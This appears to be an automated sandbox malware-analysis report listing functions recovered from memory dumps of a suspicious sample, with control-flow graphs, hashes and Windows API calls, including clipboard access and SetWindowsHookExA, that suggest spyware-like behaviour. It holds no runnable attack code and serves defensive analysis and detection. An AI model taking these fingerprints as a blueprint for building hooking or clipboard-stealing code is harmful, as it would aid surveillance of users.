                                                                    • Not Executed
                                                                    control_flow_graph 446 6ce9130-6ce9155 447 6ce9157-6ce915a 446->447 448 6ce9a18-6ce9a1b 447->448 449 6ce9160-6ce9175 447->449 450 6ce9a1d-6ce9a3c 448->450 451 6ce9a41-6ce9a43 448->451 456 6ce918d-6ce91a3 449->456 457 6ce9177-6ce917d 449->457 450->451 452 6ce9a4a-6ce9a4d 451->452 453 6ce9a45 451->453 452->447 455 6ce9a53-6ce9a5d 452->455 453->452 463 6ce91ae-6ce91b0 456->463 459 6ce917f 457->459 460 6ce9181-6ce9183 457->460 459->456 460->456 464 6ce91c8-6ce9239 463->464 465 6ce91b2-6ce91b8 463->465 476 6ce923b-6ce925e 464->476 477 6ce9265-6ce9281 464->477 466 6ce91bc-6ce91be 465->466 467 6ce91ba 465->467 466->464 467->464 476->477 482 6ce92ad-6ce92c8 477->482 483 6ce9283-6ce92a6 477->483 488 6ce92ca-6ce92ec 482->488 489 6ce92f3-6ce930e 482->489 483->482 488->489 494 6ce9333-6ce9341 489->494 495 6ce9310-6ce932c 489->495 496 6ce9343-6ce934c 494->496 497 6ce9351-6ce93cb 494->497 495->494 496->455 503 6ce93cd-6ce93eb 497->503 504 6ce9418-6ce942d 497->504 508 6ce93ed-6ce93fc 503->508 509 6ce9407-6ce9416 503->509 504->448 508->509 509->503 509->504
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000006.00000002.4541039855.0000000006CE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CE0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_6_2_6ce0000_z1E-catalogSamples.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: $]q$$]q$$]q$$]q
                                                                    • API String ID: 0-858218434
                                                                    • Opcode ID: b649f76cc94e85efcd095cb9f7668f713c869f09795a3ffc501f0db5843f5098
                                                                    • Instruction ID: 29b93eb4bfdbaaf12cd8391182d8e1afe2ea4f5efd7cd38fa4713e384999eaa8
                                                                    • Opcode Fuzzy Hash: b649f76cc94e85efcd095cb9f7668f713c869f09795a3ffc501f0db5843f5098
                                                                    • Instruction Fuzzy Hash: D5914230B0021A9FDB54DF69D8547AEB7F6FF84204F108469C80DEB345EA74ED468B92
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 06CECF30 Relevance: 4.5, Strings: 3, Instructions: 797COMMON
                                                                    Download Yara Rule

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 512 6cecf30-6cecf4b 513 6cecf4d-6cecf50 512->513 514 6cecf99-6cecf9c 513->514 515 6cecf52-6cecf94 513->515 516 6cecf9e-6cecfe0 514->516 517 6cecfe5-6cecfe8 514->517 515->514 516->517 518 6cecfea-6ced02c 517->518 519 6ced031-6ced034 517->519 518->519 521 6ced036-6ced052 519->521 522 6ced057-6ced05a 519->522 521->522 525 6ced05c-6ced09e 522->525 526 6ced0a3-6ced0a6 522->526 525->526 529 6ced0a8-6ced0be 526->529 530 6ced0c3-6ced0c6 526->530 529->530 533 6ced10f-6ced112 530->533 534 6ced0c8-6ced10a 530->534 539 6ced114-6ced116 533->539 540 6ced121-6ced124 533->540 534->533 543 6ced11c 539->543 544 6ced415 539->544 545 6ced16d-6ced170 540->545 546 6ced126-6ced168 540->546 543->540 554 6ced418-6ced424 544->554 551 6ced1b9-6ced1bc 545->551 552 6ced172-6ced1b4 545->552 546->545 555 6ced1be-6ced1c3 551->555 556 6ced1c6-6ced1c9 551->556 552->551 562 6ced27a-6ced289 554->562 563 6ced42a-6ced717 554->563 555->556 564 6ced1cb-6ced20d 556->564 565 6ced212-6ced215 556->565 568 6ced28b-6ced290 562->568 569 6ced298-6ced2a4 562->569 724 6ced93e-6ced948 563->724 725 6ced71d-6ced723 563->725 564->565 572 6ced25e-6ced261 565->572 573 6ced217-6ced226 565->573 568->569 574 6ced2aa-6ced2bc 569->574 575 6ced949-6ced97e 569->575 572->554 580 6ced267-6ced26a 572->580 582 6ced228-6ced22d 573->582 583 6ced235-6ced241 573->583 593 6ced2c1-6ced2c3 574->593 598 6ced980-6ced983 575->598 589 6ced26c-6ced26e 580->589 590 6ced275-6ced278 580->590 582->583 583->575 587 6ced247-6ced259 583->587 587->572 595 6ced2d3-6ced2dc 589->595 596 6ced270 589->596 590->562 590->593 602 6ced2ca-6ced2cd 593->602 603 6ced2c5 593->603 607 6ced2de-6ced2e3 595->607 608 6ced2eb-6ced2f7 595->608 596->590 600 6ced9a6-6ced9a9 598->600 601 6ced985-6ced9a1 598->601 609 6ced9ab 600->609 610 6ced9b8-6ced9bb 600->610 601->600 602->513 602->595 603->602 607->608 611 6ced2fd-6ced311 608->611 612 6ced408-6ced40d 608->612 771 6ced9ab call 6ceda9d 609->771 772 6ced9ab call 6cedab0 609->772 618 6ced9ee-6ced9f0 610->618 619 6ced9bd-6ced9e9 610->619 611->544 629 6ced317-6ced329 611->629 612->544 623 6ced9f7-6ced9fa 618->623 624 6ced9f2 618->624 619->618 620 6ced9b1-6ced9b3 620->610 623->598 630 6ced9fc-6ceda0b 623->630 624->623 637 6ced34d-6ced34f 629->637 638 6ced32b-6ced331 629->638 635 6ceda0d-6ceda70 call 6ce6578 630->635 636 6ceda72-6ceda87 630->636 635->636 639 6ced359-6ced365 637->639 642 6ced335-6ced341 638->642 643 6ced333 638->643 652 6ced367-6ced371 639->652 653 6ced373 639->653 644 6ced343-6ced34b 642->644 643->644 644->639 655 6ced378-6ced37a 652->655 653->655 655->544 657 6ced380-6ced39c call 6ce6578 655->657 666 6ced39e-6ced3a3 657->666 667 6ced3ab-6ced3b7 657->667 666->667 667->612 668 6ced3b9-6ced406 667->668 668->544 726 6ced725-6ced72a 725->726 727 6ced732-6ced73b 725->727 726->727 727->575 728 6ced741-6ced754 727->728 730 6ced92e-6ced938 728->730 731 6ced75a-6ced760 728->731 730->724 730->725 732 6ced76f-6ced778 731->732 733 6ced762-6ced767 731->733 732->575 734 6ced77e-6ced79f 732->734 733->732 737 6ced7ae-6ced7b7 734->737 738 6ced7a1-6ced7a6 734->738 737->575 739 6ced7bd-6ced7da 737->739 738->737 739->730 742 6ced7e0-6ced7e6 739->742 742->575 743 6ced7ec-6ced805 742->743 745 6ced80b-6ced832 743->745 746 6ced921-6ced928 743->746 745->575 749 6ced838-6ced842 745->749 746->730 746->742 749->575 750 6ced848-6ced85f 749->750 752 6ced86e-6ced889 750->752 753 6ced861-6ced86c 750->753 752->746 758 6ced88f-6ced8a8 call 6ce6578 752->758 753->752 762 6ced8aa-6ced8af 758->762 763 6ced8b7-6ced8c0 758->763 762->763 763->575 764 6ced8c6-6ced91a 763->764 764->746 771->620 772->620
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000006.00000002.4541039855.0000000006CE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CE0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_6_2_6ce0000_z1E-catalogSamples.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: $]q$$]q$$]q
                                                                    • API String ID: 0-182748909
                                                                    • Opcode ID: e29b4e1e3e2c9b2bf5c7195ce4cd8473770ba6a7ba40c60f63cc53e294f07e45
                                                                    • Instruction ID: c0e417d3a01109263b085ba6130c871a65b3abc347087b18aca1b2a1187dd384
                                                                    • Opcode Fuzzy Hash: e29b4e1e3e2c9b2bf5c7195ce4cd8473770ba6a7ba40c60f63cc53e294f07e45
                                                                    • Instruction Fuzzy Hash: 5562503070020A8FCB55DF68E594A5DBBF6FF84344B108969D00A9F36ADB75ED86CB81
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 06CE4B78 Relevance: 3.9, Strings: 3, Instructions: 186COMMON
                                                                    Download Yara Rule

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 773 6ce4b78-6ce4b9c 774 6ce4b9e-6ce4ba1 773->774 775 6ce4bc2-6ce4bc5 774->775 776 6ce4ba3-6ce4bbd 774->776 777 6ce4bcb-6ce4cc3 775->777 778 6ce52a4-6ce52a6 775->778 776->775 796 6ce4cc9-6ce4d11 777->796 797 6ce4d46-6ce4d4d 777->797 779 6ce52ad-6ce52b0 778->779 780 6ce52a8 778->780 779->774 782 6ce52b6-6ce52c3 779->782 780->779 819 6ce4d16 call 6ce5430 796->819 820 6ce4d16 call 6ce5421 796->820 798 6ce4d53-6ce4dc3 797->798 799 6ce4dd1-6ce4dda 797->799 816 6ce4dce 798->816 817 6ce4dc5 798->817 799->782 810 6ce4d1c-6ce4d38 813 6ce4d3a 810->813 814 6ce4d43-6ce4d44 810->814 813->814 814->797 816->799 817->816 819->810 820->810
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000006.00000002.4541039855.0000000006CE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CE0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_6_2_6ce0000_z1E-catalogSamples.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: fbq$XPbq$\Obq
                                                                    • API String ID: 0-4057264190
                                                                    • Opcode ID: e06876ac8f444a5506e858aa38fe4d2c43731c4650d308208b055f8a3881c6c0
                                                                    • Instruction ID: fa595b13517c4116b3af9f616d4b14e26a212a66dff9dc577e43c29d2ad3212d
                                                                    • Opcode Fuzzy Hash: e06876ac8f444a5506e858aa38fe4d2c43731c4650d308208b055f8a3881c6c0
                                                                    • Instruction Fuzzy Hash: AE617F30F0021A9FEB549FA9C8547AEBAF6FF88700F208529D106EB395DE759D418B91
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 0304E978 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 133COMMON
                                                                    Download Yara Rule

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 821 304e978-304e993 822 304e995-304e9bc 821->822 823 304e9bd-304e9da call 304e578 821->823 828 304e9db-304e9dc 823->828 829 304e9e2-304ea2c 828->829 830 304e9de-304e9e1 828->830 829->828 835 304ea2e-304ea41 829->835 837 304ea47-304ead4 GlobalMemoryStatusEx 835->837 838 304ea43-304ea46 835->838 841 304ead6-304eadc 837->841 842 304eadd-304eb05 837->842 841->842
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000006.00000002.4525926697.0000000003040000.00000040.00000800.00020000.00000000.sdmp, Offset: 03040000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_6_2_3040000_z1E-catalogSamples.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: _
                                                                    • API String ID: 0-701932520
                                                                    • Opcode ID: 6c53238ffe393cca3375fa7c5e81beb3f71d64475e45c51940bd393ba02a700d
                                                                    • Instruction ID: b09384d9e680e745290708ea3f3733b1d24f5228b74dac2d40cdde48c057e348
                                                                    • Opcode Fuzzy Hash: 6c53238ffe393cca3375fa7c5e81beb3f71d64475e45c51940bd393ba02a700d
                                                                    • Instruction Fuzzy Hash: 174111B2D043898FC704CFB9D8042AEBFF6BF89210F18856AD404A7391DB789985CBD0
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 06CEC9F0 Relevance: 2.9, Strings: 2, Instructions: 402COMMON
                                                                    Download Yara Rule

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 1493 6cec9f0-6ceca0d 1494 6ceca0f-6ceca12 1493->1494 1495 6ceca2b-6ceca2e 1494->1495 1496 6ceca14-6ceca20 1494->1496 1497 6ceca30 1495->1497 1498 6ceca41-6ceca44 1495->1498 1504 6ceca26 1496->1504 1505 6cecab5-6cecad3 1496->1505 1506 6ceca3a-6ceca3c 1497->1506 1500 6ceca46-6ceca50 1498->1500 1501 6ceca51-6ceca54 1498->1501 1502 6ceca7d-6ceca80 1501->1502 1503 6ceca56-6ceca78 1501->1503 1507 6ceca82-6ceca9e 1502->1507 1508 6cecaa3-6cecaa5 1502->1508 1503->1502 1504->1495 1513 6cecad9-6cecae2 1505->1513 1514 6ceccc0-6ceccca 1505->1514 1506->1498 1507->1508 1509 6cecaac-6cecaaf 1508->1509 1510 6cecaa7 1508->1510 1509->1494 1509->1505 1510->1509 1517 6cecccb-6cecd07 1513->1517 1518 6cecae8-6cecb02 1513->1518 1527 6cecd09-6cecd0c 1517->1527 1523 6ceccae-6ceccba 1518->1523 1524 6cecb08-6cecb11 1518->1524 1523->1513 1523->1514 1524->1517 1526 6cecb17-6cecb42 1524->1526 1545 6cecc9c-6cecca8 1526->1545 1546 6cecb48-6cecba1 1526->1546 1528 6cecd2e-6cecd31 1527->1528 1529 6cecd0e-6cecd29 1527->1529 1531 6cecd52-6cecd55 1528->1531 1532 6cecd33-6cecd4d 1528->1532 1529->1528 1533 6ceceda-6cecedd 1531->1533 1534 6cecd5b-6cecd72 1531->1534 1532->1531 1538 6ceceff-6cecf01 1533->1538 1539 6cecedf-6cecefa 1533->1539 1549 6cecd79-6cecd87 1534->1549 1550 6cecd74-6cecd77 1534->1550 1542 6cecf08-6cecf0b 1538->1542 1543 6cecf03 1538->1543 1539->1538 1542->1527 1547 6cecf11-6cecf1b 1542->1547 1543->1542 1545->1523 1545->1524 1573 6cecba7-6cecbad 1546->1573 1574 6cecba3-6cecba5 1546->1574 1552 6cecd8c-6cecdaa 1549->1552 1556 6cecd89 1549->1556 1550->1552 1560 6cecdac-6cecdaf 1552->1560 1561 6cecdb4-6ceced9 call 6ce6578 1552->1561 1556->1552 1560->1547 1575 6cecbb3-6cecbce 1573->1575 1574->1575 1581 6cecbd4-6cecbda 1575->1581 1582 6cecbd0-6cecbd2 1575->1582 1584 6cecbe0-6cecbee 1581->1584 1582->1584 1587 6cecbfc 1584->1587 1588 6cecbf0-6cecbfa 1584->1588 1589 6cecc01-6cecc03 1587->1589 1588->1589 1589->1545 1591 6cecc09-6cecc0b 1589->1591 1592 6cecc0d-6cecc17 1591->1592 1593 6cecc19 1591->1593 1595 6cecc1e-6cecc20 1592->1595 1593->1595 1595->1545 1596 6cecc22-6cecc95 call 6ce6578 1595->1596 1596->1545
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000006.00000002.4541039855.0000000006CE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CE0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_6_2_6ce0000_z1E-catalogSamples.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: 0o@p$Dq@p
                                                                    • API String ID: 0-1537369123
                                                                    • Opcode ID: f4dcedbaa3cad30df6060e79300318393e5a9a68ed7a498aa48e1f4f77a0f642
                                                                    • Instruction ID: 22f126b85817ebd8fa0d066890b23d7ec26074e6b500e639de282fdd0e72cfd5
                                                                    • Opcode Fuzzy Hash: f4dcedbaa3cad30df6060e79300318393e5a9a68ed7a498aa48e1f4f77a0f642
                                                                    • Instruction Fuzzy Hash: 2AE1A030B002058FCB55DB79E494AADBBF2EF88314F108569D41ADB362DB35ED86CB91
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 06CE9125 Relevance: 2.7, Strings: 2, Instructions: 156COMMON
                                                                    Download Yara Rule

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 1918 6ce9125-6ce9155 1919 6ce9157-6ce915a 1918->1919 1920 6ce9a18-6ce9a1b 1919->1920 1921 6ce9160-6ce9175 1919->1921 1922 6ce9a1d-6ce9a3c 1920->1922 1923 6ce9a41-6ce9a43 1920->1923 1928 6ce918d-6ce91a3 1921->1928 1929 6ce9177-6ce917d 1921->1929 1922->1923 1924 6ce9a4a-6ce9a4d 1923->1924 1925 6ce9a45 1923->1925 1924->1919 1927 6ce9a53-6ce9a5d 1924->1927 1925->1924 1935 6ce91ae-6ce91b0 1928->1935 1931 6ce917f 1929->1931 1932 6ce9181-6ce9183 1929->1932 1931->1928 1932->1928 1936 6ce91c8-6ce9239 1935->1936 1937 6ce91b2-6ce91b8 1935->1937 1948 6ce923b-6ce925e 1936->1948 1949 6ce9265-6ce9281 1936->1949 1938 6ce91bc-6ce91be 1937->1938 1939 6ce91ba 1937->1939 1938->1936 1939->1936 1948->1949 1954 6ce92ad-6ce92c8 1949->1954 1955 6ce9283-6ce92a6 1949->1955 1960 6ce92ca-6ce92ec 1954->1960 1961 6ce92f3-6ce930e 1954->1961 1955->1954 1960->1961 1966 6ce9333-6ce9341 1961->1966 1967 6ce9310-6ce932c 1961->1967 1968 6ce9343-6ce934c 1966->1968 1969 6ce9351-6ce93cb 1966->1969 1967->1966 1968->1927 1975 6ce93cd-6ce93eb 1969->1975 1976 6ce9418-6ce942d 1969->1976 1980 6ce93ed-6ce93fc 1975->1980 1981 6ce9407-6ce9416 1975->1981 1976->1920 1980->1981 1981->1975 1981->1976
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000006.00000002.4541039855.0000000006CE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CE0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_6_2_6ce0000_z1E-catalogSamples.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: $]q$$]q
                                                                    • API String ID: 0-127220927
                                                                    • Opcode ID: 6a558d4885fb2b2fe861bef36a6c646edea38e7fee7140e1b2acf0edc8af181e
                                                                    • Instruction ID: 740fa4bbc597c7ff9a17290cc372bdbcc16788c9be0c1f19c61b8fade9b8b570
                                                                    • Opcode Fuzzy Hash: 6a558d4885fb2b2fe861bef36a6c646edea38e7fee7140e1b2acf0edc8af181e
                                                                    • Instruction Fuzzy Hash: A4518331B002169FDB54DB78D864BAEB7F6FF84204F108469C909DB394EE34ED468B92
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 06CE4B68 Relevance: 2.6, Strings: 2, Instructions: 142COMMON
                                                                    Download Yara Rule

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 2059 6ce4b68-6ce4b9c 2060 6ce4b9e-6ce4ba1 2059->2060 2061 6ce4bc2-6ce4bc5 2060->2061 2062 6ce4ba3-6ce4bbd 2060->2062 2063 6ce4bcb-6ce4cc3 2061->2063 2064 6ce52a4-6ce52a6 2061->2064 2062->2061 2082 6ce4cc9-6ce4d11 2063->2082 2083 6ce4d46-6ce4d4d 2063->2083 2065 6ce52ad-6ce52b0 2064->2065 2066 6ce52a8 2064->2066 2065->2060 2068 6ce52b6-6ce52c3 2065->2068 2066->2065 2105 6ce4d16 call 6ce5430 2082->2105 2106 6ce4d16 call 6ce5421 2082->2106 2084 6ce4d53-6ce4dc3 2083->2084 2085 6ce4dd1-6ce4dda 2083->2085 2102 6ce4dce 2084->2102 2103 6ce4dc5 2084->2103 2085->2068 2096 6ce4d1c-6ce4d38 2099 6ce4d3a 2096->2099 2100 6ce4d43-6ce4d44 2096->2100 2099->2100 2100->2083 2102->2085 2103->2102 2105->2096 2106->2096
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000006.00000002.4541039855.0000000006CE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CE0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_6_2_6ce0000_z1E-catalogSamples.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: fbq$XPbq
                                                                    • API String ID: 0-2292610095
                                                                    • Opcode ID: 13b46bac4db263febf9cafebd9f533c55b9ccc0d8e6cbf87925d287ad8c6106c
                                                                    • Instruction ID: 9f0d946ca6357d58a67f35d39dfa8a6032f8e7e484ada4b72755553dcc26f3ed
                                                                    • Opcode Fuzzy Hash: 13b46bac4db263febf9cafebd9f533c55b9ccc0d8e6cbf87925d287ad8c6106c
                                                                    • Instruction Fuzzy Hash: 3F517D30F002099FDB559FE9C854BAEBAF6FF88700F208529D106AB395DA759D01CB91
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 06CD2593 Relevance: 1.6, APIs: 1, Instructions: 115COMMON
                                                                    Download Yara Rule

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 2613 6cd2593-6cd25fe 2615 6cd2609-6cd2610 2613->2615 2616 6cd2600-6cd2606 2613->2616 2617 6cd261b-6cd2653 2615->2617 2618 6cd2612-6cd2618 2615->2618 2616->2615 2619 6cd265b-6cd26ba CreateWindowExW 2617->2619 2618->2617 2620 6cd26bc-6cd26c2 2619->2620 2621 6cd26c3-6cd26fb 2619->2621 2620->2621 2625 6cd26fd-6cd2700 2621->2625 2626 6cd2708 2621->2626 2625->2626 2627 6cd2709 2626->2627 2627->2627
                                                                    APIs
                                                                    • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 06CD26AA
                                                                    Memory Dump Source
                                                                    • Source File: 00000006.00000002.4540957216.0000000006CD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CD0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_6_2_6cd0000_z1E-catalogSamples.jbxd
                                                                    Similarity
                                                                    • API ID: CreateWindow
                                                                    • String ID:
                                                                    • API String ID: 716092398-0
                                                                    • Opcode ID: 0e9fa0639509d0cafdccc7b90b6e1f11e3dbea0663961bea15ec058f18e53877
                                                                    • Instruction ID: 4bd63a51884fec5d13ee44b56cf897956f6a20b587a3d941a4793e4ee75184c6
                                                                    • Opcode Fuzzy Hash: 0e9fa0639509d0cafdccc7b90b6e1f11e3dbea0663961bea15ec058f18e53877
                                                                    • Instruction Fuzzy Hash: A841B0B1D003099FDB14CF9AC984ADEFBB5FF48310F24812AE919AB250D775A945CF90
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 06CD2598 Relevance: 1.6, APIs: 1, Instructions: 113COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 06CD26AA
                                                                    Memory Dump Source
                                                                    • Source File: 00000006.00000002.4540957216.0000000006CD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CD0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_6_2_6cd0000_z1E-catalogSamples.jbxd
                                                                    Similarity
                                                                    • API ID: CreateWindow
                                                                    • String ID:
                                                                    • API String ID: 716092398-0
                                                                    • Opcode ID: 49c2055c32bda56a27a6eba9dec889393dc04b39b0e241ae11be21fbf856ceed
                                                                    • Instruction ID: aaa31ea53b1b9cbf8e11b91cab41740cdf44f19cb8839cfb20c9e57607c2c01f
                                                                    • Opcode Fuzzy Hash: 49c2055c32bda56a27a6eba9dec889393dc04b39b0e241ae11be21fbf856ceed
                                                                    • Instruction Fuzzy Hash: 4741BEB1D003099FDB14CF9AC984ADEFBB5FF48310F24812AE919AB250D775A985CF90
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 06CD5EDC Relevance: 1.6, APIs: 1, Instructions: 97COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • CallWindowProcW.USER32(?,?,?,?,?), ref: 06CD7249
                                                                    Memory Dump Source
                                                                    • Source File: 00000006.00000002.4540957216.0000000006CD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CD0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_6_2_6cd0000_z1E-catalogSamples.jbxd
                                                                    Similarity
                                                                    • API ID: CallProcWindow
                                                                    • String ID:
                                                                    • API String ID: 2714655100-0
                                                                    • Opcode ID: 59242cfd289cd8265267876242e8ea4cf5467babc6de833d03123c0df78d8507
                                                                    • Instruction ID: f3d3b0baf99ef90827850cc7f1d8283ad69f8324bcbe2f62980f9264a046b1bb
                                                                    • Opcode Fuzzy Hash: 59242cfd289cd8265267876242e8ea4cf5467babc6de833d03123c0df78d8507
                                                                    • Instruction Fuzzy Hash: CF4119B5900345DFDB54DF99C888AAAFBF5FF88318F248459E519A7321D334A941CFA0
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 06CD7EC4 Relevance: 1.6, APIs: 1, Instructions: 87comclipboardCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000006.00000002.4540957216.0000000006CD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CD0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_6_2_6cd0000_z1E-catalogSamples.jbxd
                                                                    Similarity
                                                                    • API ID: Clipboard
                                                                    • String ID:
                                                                    • API String ID: 220874293-0
                                                                    • Opcode ID: ac9f1946219a06c87cbfdff311589d3f16a812ad85522d2f06cb35b70de17163
                                                                    • Instruction ID: 8cc7685426dd17b89d83ffec7a7ccadb2ba3473844d6ff51e7fc1adb5aedfed0
                                                                    • Opcode Fuzzy Hash: ac9f1946219a06c87cbfdff311589d3f16a812ad85522d2f06cb35b70de17163
                                                                    • Instruction Fuzzy Hash: 6F3112B1D012089FDB50DF99D984BDEFBF5EB48310F20802AE508AB290CB756945CBA5
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 06CD78F0 Relevance: 1.6, APIs: 1, Instructions: 74comclipboardCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000006.00000002.4540957216.0000000006CD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CD0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_6_2_6cd0000_z1E-catalogSamples.jbxd
                                                                    Similarity
                                                                    • API ID: Clipboard
                                                                    • String ID:
                                                                    • API String ID: 220874293-0
                                                                    • Opcode ID: ac49913b21c0ee52c65e46429f2f6f6c6aecbbefe680042f49c6d15ad77dbbe7
                                                                    • Instruction ID: 5aa5b2893753fc45e215fab998f7eea79a9228ddda036572b5f5d3b07b649692
                                                                    • Opcode Fuzzy Hash: ac49913b21c0ee52c65e46429f2f6f6c6aecbbefe680042f49c6d15ad77dbbe7
                                                                    • Instruction Fuzzy Hash: 4F3100B0D01209DFDB60DF99C984BDEBBF5AF48304F248029E508BB390D775A944CBA5
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 06CD62E8 Relevance: 1.6, APIs: 1, Instructions: 65COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 06CD6377
                                                                    Memory Dump Source
                                                                    • Source File: 00000006.00000002.4540957216.0000000006CD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CD0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_6_2_6cd0000_z1E-catalogSamples.jbxd
                                                                    Similarity
                                                                    • API ID: DuplicateHandle
                                                                    • String ID:
                                                                    • API String ID: 3793708945-0
                                                                    • Opcode ID: 6b2b318c72d59f6bdd0325358fcbf0a4a870941f5b63684422ac68f915560379
                                                                    • Instruction ID: 8ae082388f250ad39eec8e3343bae8af7a8bef0b754c339188d7ea5ce26738c6
                                                                    • Opcode Fuzzy Hash: 6b2b318c72d59f6bdd0325358fcbf0a4a870941f5b63684422ac68f915560379
                                                                    • Instruction Fuzzy Hash: AE21C3B59002489FDB10DF9AD584AEEFBF9EB49320F14841AE958A3350C378A944CFA1
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 06CD62F0 Relevance: 1.6, APIs: 1, Instructions: 62COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 06CD6377
                                                                    Memory Dump Source
                                                                    • Source File: 00000006.00000002.4540957216.0000000006CD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CD0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_6_2_6cd0000_z1E-catalogSamples.jbxd
                                                                    Similarity
                                                                    • API ID: DuplicateHandle
                                                                    • String ID:
                                                                    • API String ID: 3793708945-0
                                                                    • Opcode ID: 5122ac41689c3e5266f834958108dcc9ce9e3f234a414294994f3998359c44f7
                                                                    • Instruction ID: cfaa0cd571dea4057e92abd42d96d9234c617792c86a7095f64e4f2d4042e13b
                                                                    • Opcode Fuzzy Hash: 5122ac41689c3e5266f834958108dcc9ce9e3f234a414294994f3998359c44f7
                                                                    • Instruction Fuzzy Hash: B621C4B5D002499FDB10DF9AD984AEEFBF9FB48310F14841AE918A3350D378A954CFA5
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 06CD9A0F Relevance: 1.6, APIs: 1, Instructions: 58COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • SetWindowsHookExA.USER32(?,00000000,?,?), ref: 06CD9A8B
                                                                    Memory Dump Source
                                                                    • Source File: 00000006.00000002.4540957216.0000000006CD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CD0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_6_2_6cd0000_z1E-catalogSamples.jbxd
                                                                    Similarity
                                                                    • API ID: HookWindows
                                                                    • String ID:
                                                                    • API String ID: 2559412058-0
